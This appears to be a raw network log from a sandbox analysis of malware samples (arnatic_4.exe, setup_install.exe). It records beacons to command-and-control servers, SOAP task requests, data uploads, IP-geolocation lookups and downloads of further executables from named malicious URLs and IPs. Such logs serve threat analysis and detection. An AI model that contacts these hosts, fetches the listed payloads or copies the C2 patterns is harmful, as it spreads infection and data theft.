  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=skBM6%2FVoS43b5V69e23V9ywZR3wrkEacCWe4m2J7SERNk8CiEuYMU%2FC0Oc7nDO4k8VFwTRqbVex6V8PWE3nPzyz5GEoRCkUcJOZec6j03squJ0dwBAz8L8IOwLwCOA%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 666827ce2fee0c81-AMS
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

DNS www.facebook.com
arnatic_4.exe
Remote address: 8.8.8.8:53
Request
  www.facebook.com IN A
Response
  www.facebook.com IN CNAME star-mini.c10r.facebook.com
  star-mini.c10r.facebook.com IN A 31.13.83.36

DNS ol.gamegame.info
Remote address: 8.8.8.8:53
Request
  ol.gamegame.info IN A
Response
  ol.gamegame.info IN A 104.21.21.221
  ol.gamegame.info IN A 172.67.200.215

POST http://ol.gamegame.info/report7.4.php
Remote address: 104.21.21.221:80
Request
  POST /report7.4.php HTTP/1.1
  Accept: */*
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
  Host: ol.gamegame.info
  Content-Length: 278
  Connection: Keep-Alive
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Date: Mon, 28 Jun 2021 16:05:13 GMT
  Content-Type: application/json; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  CF-Cache-Status: DYNAMIC
  cf-request-id: 0af4f72cce00004c5575b3c000000001
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SSIERkboMhyy8lrFS5NZzWu9l6U6Ap7JhTejZrHF2aWvA2OxjJyiplP4GKlVsGhVzh0jwY99AqefaX1ryF%2BNUvVdDmP3pvdOd5ZLMUZ2%2BOha5BUn6TqA17CINJUuSw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 666827c14e6e4c55-AMS
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

DNS zedaumalev.xyz
Remote address: 8.8.8.8:53
Request
  zedaumalev.xyz IN A
Response
  zedaumalev.xyz IN A 77.246.145.4

POST http://zedaumalev.xyz/
Remote address: 77.246.145.4:80
Request
  POST / HTTP/1.1
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
  Host: zedaumalev.xyz
  Content-Length: 137
  Expect: 100-continue
  Accept-Encoding: gzip, deflate
  Connection: Keep-Alive
Response
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 28 Jun 2021 16:05:17 GMT
  Content-Type: text/xml; charset=utf-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Keep-Alive: timeout=3
  Vary: Accept-Encoding
  Content-Encoding: gzip

DNS api.ip.sb
Remote address: 8.8.8.8:53
Request
  api.ip.sb IN A
Response
  api.ip.sb IN CNAME api.ip.sb.cdn.cloudflare.net
  api.ip.sb.cdn.cloudflare.net IN A 172.67.75.172
  api.ip.sb.cdn.cloudflare.net IN A 104.26.13.31
  api.ip.sb.cdn.cloudflare.net IN A 104.26.12.31

DNS uyg5wye.2ihsfa.com
Remote address: 8.8.8.8:53
Request
  uyg5wye.2ihsfa.com IN A
Response
  uyg5wye.2ihsfa.com IN A 88.218.92.148

GET http://uyg5wye.2ihsfa.com/api/fbtime
Remote address: 88.218.92.148:80
Request
  GET /api/fbtime HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Host: uyg5wye.2ihsfa.com
Response
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 28 Jun 2021 16:05:19 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.3.21

POST http://uyg5wye.2ihsfa.com/api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e
Remote address: 88.218.92.148:80
Request
  POST /api/?sid=3067&key=d2b40fda1b3933e19a6b502eeaa1f58e HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
  Content-Length: 266
  Host: uyg5wye.2ihsfa.com
Response
  HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 28 Jun 2021 16:05:20 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
  Vary: Accept-Encoding
  X-Powered-By: PHP/7.3.21

DNS www.microsoft.com
Remote address: 8.8.8.8:53
Request
  www.microsoft.com IN A
Response
  www.microsoft.com IN CNAME www.microsoft.com-c-3.edgekey.net
  www.microsoft.com-c-3.edgekey.net IN CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
  www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net IN CNAME e13678.dscb.akamaiedge.net
  e13678.dscb.akamaiedge.net IN A
                                                                2.21.41.70
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/865
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST /865 HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:32 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 3528
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:33 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                GET
                                                                http://uyg5wye.2ihsfa.com/api/fbtime
                                                                Remote address:
                                                                88.218.92.148:80
                                                                Request
                                                                GET /api/fbtime HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                Host: uyg5wye.2ihsfa.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:38 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                X-Powered-By: PHP/7.3.21
                                                              • flag-unknown
                                                                POST
                                                                http://uyg5wye.2ihsfa.com/api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb
                                                                Remote address:
                                                                88.218.92.148:80
                                                                Request
                                                                POST /api/?sid=3227&key=ca741ea974de738c9faec1d9442649eb HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                Content-Length: 266
                                                                Host: uyg5wye.2ihsfa.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:39 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                X-Powered-By: PHP/7.3.21
                                                              • flag-unknown
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 433
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:06:00 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=100
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                              • flag-unknown
                                                                POST
                                                                http://136.144.41.152/base/api/getData.php
                                                                Remote address:
                                                                136.144.41.152:80
                                                                Request
                                                                POST /base/api/getData.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Content-Length: 133
                                                                Host: 136.144.41.152
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:06:00 GMT
                                                                Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                                                X-Powered-By: PHP/7.3.28
                                                                Content-Length: 108
                                                                Keep-Alive: timeout=5, max=99
                                                                Connection: Keep-Alive
                                                                Content-Type: text/html; charset=UTF-8
                                                              • flag-unknown
                                                                DNS
                                                                iplis.ru
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iplis.ru
                                                                IN A
                                                                Response
                                                                iplis.ru
                                                                IN A
                                                                88.99.66.31
                                                              • flag-unknown
                                                                POST
                                                                http://zedaumalev.xyz/
                                                                Remote address:
                                                                77.246.145.4:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                Host: zedaumalev.xyz
                                                                Content-Length: 7439
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:06:03 GMT
                                                                Content-Type: text/xml; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                POST
                                                                http://zedaumalev.xyz/
                                                                Remote address:
                                                                77.246.145.4:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                Host: zedaumalev.xyz
                                                                Content-Length: 7425
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:06:03 GMT
                                                                Content-Type: text/xml; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                ppcspb.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ppcspb.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                mebbing.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                mebbing.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                twcamel.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                twcamel.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                howdycash.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                howdycash.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 334
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:07:58 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 239
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:07:59 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                DNS
                                                                api.2ip.ua
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                api.2ip.ua
                                                                IN A
                                                                Response
                                                                api.2ip.ua
                                                                IN A
                                                                77.123.139.190
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 282
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:02 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://185.215.113.64:8765/
                                                                Remote address:
                                                                185.215.113.64:8765
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                Host: 185.215.113.64:8765
                                                                Content-Length: 137
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Content-Length: 4724
                                                                Content-Type: text/xml; charset=utf-8
                                                                Server: Microsoft-HTTPAPI/2.0
                                                                Date: Mon, 28 Jun 2021 16:08:03 GMT
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 202
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:08:07 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 0
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 169
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:09 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 133
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:11 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 201
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:14 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                DNS
                                                                api.ip.sb
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                api.ip.sb
                                                                IN A
                                                                Response
                                                                api.ip.sb
                                                                IN CNAME
                                                                api.ip.sb.cdn.cloudflare.net
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                172.67.75.172
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                104.26.12.31
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                104.26.13.31
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 223
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:17 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 265
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:20 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • flag-unknown
                                                                POST
                                                                http://lahuertasonora.com/upload/
                                                                Remote address:
                                                                79.106.245.34:80
                                                                Request
                                                                POST /upload/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://lahuertasonora.com/upload/
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 273
                                                                Host: lahuertasonora.com
                                                                Response
                                                                HTTP/1.0 404 Not Found
                                                                Date: Mon, 28 Jun 2021 16:08:23 GMT
                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                X-Powered-By: PHP/5.6.40
                                                                Content-Length: 334
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                              • 104.21.12.59:80
                                                                http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7
                                                                http
                                                                setup_install.exe
                                                                473 B
                                                                814 B
                                                                6
                                                                5

                                                                HTTP Request

                                                                GET http://motiwa.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4&oname[]=25June325AM&oname[]=7&oname[]=1&oname[]=2&oname[]=3&oname[]=4&oname[]=5&oname[]=6&cnt=7

                                                                HTTP Response

                                                                200
                                                              • 208.95.112.1:80
                                                                http://ip-api.com/json/
                                                                http
                                                                arnatic_4.exe
                                                                774 B
                                                                672 B
                                                                6
                                                                4

                                                                HTTP Request

                                                                GET http://ip-api.com/json/

                                                                HTTP Response

                                                                200
                                                              • 172.67.201.250:443
                                                                videoconvert-download38.xyz
                                                                tls
                                                                11.6kB
                                                                603.9kB
                                                                233
                                                                428
                                                              • 31.13.83.36:443
                                                                www.facebook.com
                                                                tls
                                                                11.5kB
                                                                540.2kB
                                                                216
                                                                395
                                                              • 88.99.66.31:443
                                                                iplogger.org
                                                                tls
                                                                827 B
                                                                7.2kB
                                                                10
                                                                10
                                                              • 88.99.66.31:443
                                                                iplogger.org
                                                                tls
                                                                568 B
1.4kB | 6 | 5
• 136.144.41.133:80 | http://136.144.41.133/server.txt | http | 479 B | 515 B | 6 | 5
    HTTP Request: GET http://136.144.41.133/server.txt
    HTTP Response: 200
• 34.117.59.81:443 | ipinfo.io | tls | 968 B | 7.7kB | 10 | 11
• 216.239.32.29:80 | http://pki.goog/gsr1/gsr1.crt | http | 357 B | 3.0kB | 5 | 4
    HTTP Request: GET http://pki.goog/gsr1/gsr1.crt
    HTTP Response: 200
• 127.0.0.1:62764 | setup_install.exe
• 127.0.0.1:62766 | setup_install.exe
• 74.114.154.22:443 | sergeevih43.tumblr.com | tls | 1.2kB | 20.6kB | 16 | 19
• 136.144.41.152:80 | http://136.144.41.152/base/api/getData.php | http | 1.2kB | 2.5kB | 9 | 8
    HTTP Request: POST http://136.144.41.152/base/api/getData.php
    HTTP Response: 200
    HTTP Request: POST http://136.144.41.152/base/api/getData.php
    HTTP Response: 200
• 45.133.245.228:80 | http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe | http | 7.2kB | 379.6kB | 146 | 260
    HTTP Request: HEAD http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
    HTTP Response: 200
    HTTP Request: GET http://freeprivacytoolsforyou.xyz/downloads/toolspab2.exe
    HTTP Response: 200
• 162.159.129.233:80 | cdn.discordapp.com | tls | 399 B | 528 B | 5 | 5
• 162.159.129.233:80 | cdn.discordapp.com | tls | 399 B | 528 B | 5 | 5
• 172.67.158.82:80 | jom.diregame.live | tls | 398 B | 528 B | 5 | 5
• 136.144.41.133:80 | http://136.144.41.133/WW/file1.exe | http | 33.5kB | 1.5MB | 644 | 1004
    HTTP Request: HEAD http://136.144.41.133/WW/file7.exe
    HTTP Response: 200
    HTTP Request: HEAD http://136.144.41.133/WW/file1.exe
    HTTP Response: 200
    HTTP Request: GET http://136.144.41.133/WW/file2.exe
    HTTP Response: 200
    HTTP Request: GET http://136.144.41.133/WW/file1.exe
    HTTP Response: 200
• 136.144.41.133:80 | http://136.144.41.133/WW/file8.exe | http | 29.7kB | 1.2MB | 565 | 827
    HTTP Request: HEAD http://136.144.41.133/WW/file2.exe
    HTTP Response: 200
    HTTP Request: HEAD http://136.144.41.133/WW/file8.exe
    HTTP Response: 200
    HTTP Request: GET http://136.144.41.133/WW/file7.exe
    HTTP Response: 200
    HTTP Request: GET http://136.144.41.133/WW/file8.exe
• 185.20.227.194:80 | 152 B | 3
• 172.67.158.82:80 | jom.diregame.live | tls | 360 B | 528 B | 5 | 5
• 162.159.129.233:80 | cdn.discordapp.com | tls | 399 B | 528 B | 5 | 5
